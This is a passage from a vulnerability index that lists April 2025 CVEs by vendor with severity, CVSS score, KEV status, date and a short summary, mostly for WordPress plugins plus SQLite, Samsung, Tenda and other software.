CVE-2025-32684 | Medium | 5.0 | — | 2025-04-09 | Missing Authorization vulnerability in RomanCode MapSVG mapsvg-lite-interactive-vector-maps allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MapSVG: from n/a through <= 8.6.4. |
Samsung Mobile · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20935 | Medium | 5.5 | — | 2025-04-08 | Improper handling of insufficient permission or privileges in ClipboardService prior to SMR Apr-2025 Release 1 allows local attackers to access files with system privilege. |
CVE-2025-20940 | Medium | 4.0 | — | 2025-04-08 | Improper handling of insufficient permission in Samsung Device Health Manager Service prior to SMR Apr-2025 Release 1 allows local attackers to access provider in SDMHS. |
Scand · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32517 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SCAND MultiMailer scand-multi-mailer allows Reflected XSS. This issue affects MultiMailer: from n/a through <= 1.0.3. |
CVE-2025-32505 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in SCAND MultiMailer scand-multi-mailer allows Stored XSS. This issue affects MultiMailer: from n/a through <= 1.0.3. |
Silverstripe · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30148 | Medium | 5.4 | — | 2025-04-10 | Silverstripe Framework is a PHP framework which powers the Silverstripe CMS. |
CVE-2025-25197 | Medium | 5.4 | — | 2025-04-10 | Silverstripe Elemental extends a page type to swap the content area for a list of manageable elements to compose a page out of rather than a single text field. |
Spider Themes · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32216 | Medium | 6.4 | — | 2025-04-10 | Missing Authorization vulnerability in Spider Themes Spider Elements spider-elements allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spider Elements: from n/a through <= 1.6.6. |
CVE-2025-32221 | Medium | 5.4 | — | 2025-04-10 | Missing Authorization vulnerability in Spider Themes EazyDocs eazydocs allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EazyDocs: from n/a through <= 2.7.1. |
Spotfire · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3115 | Critical | 9.8 | — | 2025-04-09 | Injection Vulnerabilities: Attackers can inject malicious code, potentially gaining control over the system executing these functions. |
CVE-2025-3114 | — | — | — | 2025-04-09 | Code Execution via Malicious Files: Attackers can create specially crafted files with embedded code that may execute without adequate security validation, potentially leading to system compromise. |
Sqlite · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29088 | Medium | 5.6 | — | 2025-04-10 | In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API) can cause a denial of service (application crash). |
CVE-2025-29087 | Low | 3.2 | — | 2025-04-07 | In SQLite 3.44.0 through 3.49.0 before 3.49.1, the concat_ws() SQL function can cause memory to be written beyond the end of a malloc-allocated buffer. |
Subnet Solutions · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31935 | Medium | 6.2 | — | 2025-04-11 | Subnet Solutions PowerSYSTEM Center is affected by a mishandling of exceptional conditions vulnerability. |
CVE-2025-31354 | Medium | 4.3 | — | 2025-04-11 | Subnet Solutions PowerSYSTEM Center's SMTPS notification service can be affected by importing an EC certificate with crafted F2m parameters, which can lead to excessive CPU consumption during the evaluation of the curve parameters. |
Tenda · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3346 | High | 8.8 | — | 2025-04-07 | A vulnerability was found in Tenda AC7 15.03.06.44. |
CVE-2025-3328 | High | 8.8 | — | 2025-04-07 | A vulnerability was found in Tenda AC1206 15.03.06.23. |
Verbb · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32427 | Medium | 5.4 | — | 2025-04-11 | Formie is a Craft CMS plugin for creating forms. |
CVE-2025-32426 | Medium | 4.6 | — | 2025-04-11 | Formie is a Craft CMS plugin for creating forms. |
Videx Inc. · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22375 | — | — | — | 2025-04-10 | An authentication bypass vulnerability was found in Videx's CyberAudit-Web. |
CVE-2025-22374 | — | — | — | 2025-04-10 | A Server-Side Request Forgery (SSRF) vulnerability was discovered in the videx-legacy-ssl web service of Videx’s CyberAudit-Web, affecting versions prior to 1.1.3. |
W. W. Norton · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32808 | High | 7.7 | — | 2025-04-11 | W. |
CVE-2025-32809 | Medium | 6.4 | — | 2025-04-11 | W. |
Wedevs · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2541 | Medium | 6.4 | — | 2025-04-11 | The WP Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping. |
CVE-2025-3100 | Medium | 6.4 | — | 2025-04-09 | The WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22… |
Wpminds · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2004 | Critical | 9.1 | — | 2025-04-08 | The Simple WP Events plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wpe_delete_file AJAX action in all versions up to, and including, 1.8.17. |
CVE-2025-32509 | High | 7.5 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WPMinds Simple WP Events simple-wp-events allows Path Traversal. This issue affects Simple WP Events: from n/a through <= 1.8.17. |
Yiiframework · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-58136 | Critical | 9.0 | KEV | 2025-04-10 | Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025. |
CVE-2025-32027 | Medium | 6.1 | — | 2025-04-10 | Yii is an open source PHP web framework. |
1000 Projects · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3384 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in 1000 Projects Human Resource Management System 1.0. |
1panel-dev · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32383 | Medium | 4.3 | — | 2025-04-10 | MaxKB (Max Knowledge Base) is an open source knowledge base question-answering system based on a large language model and retrieval-augmented generation (RAG). |
5sterrenspecialist · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32114 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 5sterrenspecialist WordPress 5sterrenspecialist Plugin 5-sterrenspecialist allows Reflected XSS. This issue affects WordPress 5sterrenspec… |
A.ankit · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31395 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in a.ankit Easy Custom CSS easy-custom-css allows Stored XSS. This issue affects Easy Custom CSS: from n/a through <= 1.0. |
Aaronfrey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32128 | High | 7.6 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in aaronfrey Nearby Locations nearby-locations allows SQL Injection. This issue affects Nearby Locations: from n/a through <= 1.1.1. |
Ab-tools · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32479 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ab-tools Flags Widget flags-widget allows Stored XSS. This issue affects Flags Widget: from n/a through <= 1.0.7. |
Aba Bank · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32586 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ABA Bank ABA PayWay Payment Gateway for WooCommerce aba-payway-woocommerce-payment-gateway allows Reflected XSS. This issue affects ABA Pa… |
Abozain Albanna · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31034 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in AboZain Albanna Customize Login Page customize-login-page allows Cross Site Request Forgery. This issue affects Customize Login Page: from n/a through <= 1.1. |
Accredible · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13909 | Medium | 4.9 | — | 2025-04-10 | The Accredible Certificates & Open Badges plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter an… |
Adam Nowak · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31033 | Critical | 9.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Adam Nowak Buddypress Humanity buddypress-humanity allows Cross Site Request Forgery. This issue affects Buddypress Humanity: from n/a through <= 1.2. |
Adrian Tobey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31015 | High | 7.5 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Adrian Tobey WordPress SMTP Service, Email Delivery Solved! |
Agence Web Eoxia - Montpellier · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32576 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Agence web Eoxia - Montpellier WP shop wpshop allows Upload a Web Shell to a Web Server. This issue affects WP shop: from n/a through <= 2.6.1. |
Alimir · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32259 | Medium | 5.3 | — | 2025-04-10 | Missing Authorization vulnerability in Alimir WP ULike wp-ulike. This issue affects WP ULike: from n/a through <= 4.7.9.1. |
Amir Helzer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-26888 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in Amir Helzer WooCommerce Multilingual & Multicurrency woocommerce-multilingual allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce Multilingual & Mult… |
Anantaddons · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32641 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in anantaddons Anant Addons for Elementor anant-addons-for-elementor allows Cross Site Request Forgery. This issue affects Anant Addons for Elementor: from n/a through <= 1.1.8. |
Ankit Singla · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32581 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ankit Singla WordPress Spam Blocker cf7-manual-spam-blocker allows Stored XSS. This issue affects WordPress Spam Blocker: from n/a through… |
Anytrack · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31041 | High | 7.5 | — | 2025-04-11 | Missing Authorization vulnerability in AnyTrack AnyTrack Affiliate Link Manager anytrack-affiliate-link-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AnyTrack Affiliate Link Manager: fro… |
Apeleghq · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32029 | — | — | — | 2025-04-07 | ts-asn1-der is a collection of utility classes to encode ASN.1 data following DER rule. |
Appsbd · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32642 | Critical | 10.0 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in appsbd Vite Coupon vite-coupon allows Remote Code Inclusion. This issue affects Vite Coupon: from n/a through <= 1.0.9. |
Aribhour · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31411 | Medium | 5.9 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in aribhour Linet ERP-Woocommerce Integration linet-erp-woocommerce-integration allows Path Traversal. This issue affects Linet ERP-Woocommerce Int… |
Aristo Rinjuang · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32685 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aristo Rinjuang WP Inquiries wp-inquiries allows SQL Injection. This issue affects WP Inquiries: from n/a through <= 0.2.1. |
Arm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0050 | Medium | 5.9 | — | 2025-04-07 | Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privile… |
Asaquzzaman Mishu · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31377 | High | 7.5 | — | 2025-04-09 | Missing Authorization vulnerability in Asaquzzaman mishu Woo Product Feed For Marketing Channels woocommerce-to-google-merchant-center allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Woo Product F… |
Asgaros · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32227 | Medium | 4.3 | — | 2025-04-10 | Authentication Bypass by Spoofing vulnerability in Asgaros Asgaros Forum asgaros-forum allows Identity Spoofing. This issue affects Asgaros Forum: from n/a through <= 3.0.0. |
Ashish Ajani · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32678 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Ashish Ajani WP Show Stats wp-show-stats allows Cross Site Request Forgery. This issue affects WP Show Stats: from n/a through <= 1.5. |
Ashokbasnet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32664 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ashokbasnet Nepali Date Utilities nepali-date-utilities allows Stored XSS. This issue affects Nepali Date Utilities: from n/a through <= 1.0.15. |
Athemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32158 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Syed Balkhi aThemes Addons for Elementor athemes-addons-for-elementor-lite. This issue affects aThemes Addons for Eleme… |
Austin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31026 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Austin Comment Validation Reloaded comment-validation-reloaded allows Stored XSS. This issue affects Comment Validation Reloaded: from n/a through <= 0.5. |
Axew3 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32575 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in axew3 WP w3all phpBB wp-w3all-phpbb-integration allows Reflected XSS. This issue affects WP w3all phpBB: from n/a through <= 2.9.9. |
Ays Pro · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32275 | Medium | 4.3 | — | 2025-04-10 | Authentication Bypass by Spoofing vulnerability in Ays Pro Survey Maker survey-maker allows Identity Spoofing. This issue affects Survey Maker: from n/a through <= 5.1.6.3. |
Aytechnet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30582 | High | 8.1 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in aytechnet DyaPress ERP/CRM dyapress allows PHP Local File Inclusion. This issue affects DyaPress ERP/CRM: from n/a through <= 18.0.2.0. |
Azuread · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32016 | Medium | 4.7 | — | 2025-04-09 | Microsoft Identity Web is a library which contains a set of reusable classes used in conjunction with ASP.NET Core for integrating with the Microsoft identity platform (formerly Azure AD v2.0 endpoint) and AAD B2C. |
Azurecurve · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2809 | High | 7.3 | — | 2025-04-10 | The azurecurve Shortcodes in Comments plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. |
Bdoga · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31390 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bdoga Social Crowd social-crowd allows Stored XSS. This issue affects Social Crowd: from n/a through <= 0.9.6.1. |
Benjamin Chris · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31035 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Chris WP Editor.md – The Perfect WordPress Markdown Editor wp-editormd allows Stored XSS. This issue affects WP Editor.md – The P… |
Bentoml · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32375 | Critical | 9.8 | — | 2025-04-09 | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. |
Bhoogterp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31375 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bhoogterp Scheduled scheduled allows Stored XSS. This issue affects Scheduled: from n/a through <= 1.0. |
Bjoern · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32485 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Bjoern WP Performance Pack wp-performance-pack allows Cross Site Request Forgery. This issue affects WP Performance Pack: from n/a through <= 2.5.4. |
Bluecms_project · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29150 | Medium | 4.3 | — | 2025-04-10 | BlueCMS 1.6 suffers from Arbitrary File Deletion via the id parameter in a /publish.php?act=del request. |
Blueinstyle · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32476 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in blueinstyle Advanced Tag Lists advanced-tag-list allows Stored XSS. This issue affects Advanced Tag Lists: from n/a through <= 1.2. |
Bozdoz · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32494 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bozdoz reCAPTCHA Jetpack recaptcha-jetpack allows Cross Site Request Forgery. This issue affects reCAPTCHA Jetpack: from n/a through <= 0.2.2. |
Brainstormforce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3102 | High | 8.1 | — | 2025-04-10 | The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_use… |
Brian Batt - Elearningfreak.com · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32202 | Critical | 9.1 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress insert-or-embed-articulate-content-into-wordpress allows Upload a Web Shell to a Web Server… |
Broadstreet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32211 | Medium | 6.5 | — | 2025-04-08 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Broadstreet Broadstreet Ads broadstreet allows Stored XSS. This issue affects Broadstreet Ads: from n/a through <= 1.52.1. |
C-ares · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31498 | — | — | — | 2025-04-08 | c-ares is an asynchronous resolver library. |
Canonical · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-24375 | Medium | 5.0 | — | 2025-04-09 | Charmed MySQL K8s operator is a Charmed Operator for running MySQL on Kubernetes. |
Cardgate · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32119 | High | 8.2 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CardGate CardGate Payments for WooCommerce cardgate allows Blind SQL Injection. This issue affects CardGate Payments for WooCommerce: from… |
Ch-go · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1386 | Medium | 4.9 | — | 2025-04-11 | When using the ch-go library, under a specific condition when the query includes large, uncompressed malicious external data, it is possible for an attacker in control of such data to smuggle another query packet into the connection stre… |
Chandan Garg · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31399 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Chandan Garg CG Scroll To Top cg-scroll-to-top allows Stored XSS. This issue affects CG Scroll To Top: from n/a through <= 3.5. |
Chat2 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32584 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Chat2 Chat2 chat2 allows Cross Site Request Forgery. This issue affects Chat2: from n/a through <= 4.0. |
Checkmk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-38865 | High | 8.8 | — | 2025-04-10 | Improper neutralization of livestatus command delimiters in a specific endpoint within RestAPI of Checkmk prior to 2.2.0p39, 2.3.0p25, and 2.1.0p51 (EOL) allows arbitrary livestatus command execution. |
Chillpay · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32570 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ChillPay ChillPay WooCommerce chillpay-payment-gateway allows Stored XSS. This issue affects ChillPay WooCommerce: from n/a through <= 2.5… |
Circl · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32413 | Medium | 6.4 | — | 2025-04-08 | Vulnerability-Lookup before 2.7.1 allows stored XSS via a user bio in website/web/views/user.py. |
Clickandpledge · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32550 | High | 7.2 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickandPledge Click & Pledge Connect Plugin allows SQL Injection. |
Cmsjunkie - Wordpress Business Directory Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32629 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Path Traversal. This issue affects WP-Business… |
Codelit · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32816 | Low | 3.1 | — | 2025-04-11 | CodeLit CourseLit before 0.57.5 allows Parameter Tampering via a payment plan associated with the wrong entity. |
Connman · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32743 | Critical | 9.0 | — | 2025-04-10 | In ConnMan through 1.44, the lookup string in ns_resolv in dnsproxy.c can be NULL or an empty string when the TC (Truncated) bit is set in a DNS response. |
Consumer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3329 | Low | 3.1 | — | 2025-04-07 | A vulnerability classified as problematic has been found in Consumer Comanda Mobile up to 14.9.3.2/15.0.0.8. |
Creativemindssolutions · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32210 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in CreativeMindsSolutions CM Registration and Invitation Codes cm-invitation-codes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CM Registration and Invitatio… |
Crocoblock · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22279 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Crocoblock JetCompareWishlist jet-compare-wishlist allows PHP Local File Inclusion. This issue affects JetCompareWishli… |
Croover.inc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31004 | Medium | 4.3 | — | 2025-04-09 | Missing Authorization vulnerability in Croover.inc Rich Table of Contents rich-table-of-content allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rich Table of Contents: from n/a through <= 1.4.0. |
Cyberdigm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11071 | High | 8.8 | — | 2025-04-07 | Permissive Cross-domain Policy with Untrusted Domains vulnerability in local API server of DestinyECM solution(versions described below) which is developed and maintained by Cyberdigm may allow Cross-Site Request Forgery (CSRF) attack, whi… |
Czater · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32624 | High | 7.1 | — | 2025-04-09 | Missing Authorization vulnerability in czater Czater.pl – live chat i telefon czater allows Cross Site Request Forgery.This issue affects Czater.pl – live chat i telefon: from n/a through <= 1.0.5. |
Dalziel · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32480 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dalziel Windows Live Writer windows-live-writer allows Stored XSS.This issue affects Windows Live Writer: from n/a through <= 0.1. |
Danbwb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31378 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in danbwb Oppso Unit Converter oppso-unit-converter allows Reflected XSS.This issue affects Oppso Unit Converter: from n/a through <= 1.1.1. |
Dangrossman · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32563 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dangrossman WP Calais Auto Tagger calais-auto-tagger allows Cross Site Request Forgery.This issue affects WP Calais Auto Tagger: from n/a through <= 2.0. |
Debounce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32580 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in debounce DeBounce Email Validator debounce-io-email-validator allows Stored XSS.This issue affects DeBounce Email Validator: from n/a thr… |
Detheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32260 | Medium | 5.3 | — | 2025-04-10 | Missing Authorization vulnerability in Detheme DethemeKit For Elementor dethemekit-for-elementor.This issue affects DethemeKit For Elementor: from n/a through <= 2.1.10. |
Digitalzoomstudio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3431 | High | 7.5 | — | 2025-04-08 | The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.91 via the 'dzsap_download' action. |
Dimafreund · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32501 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dimafreund Rentsyst rentsyst allows Stored XSS. This issue affects Rentsyst: from n/a through <= 2.0.92. |
Doa · 1 CVE
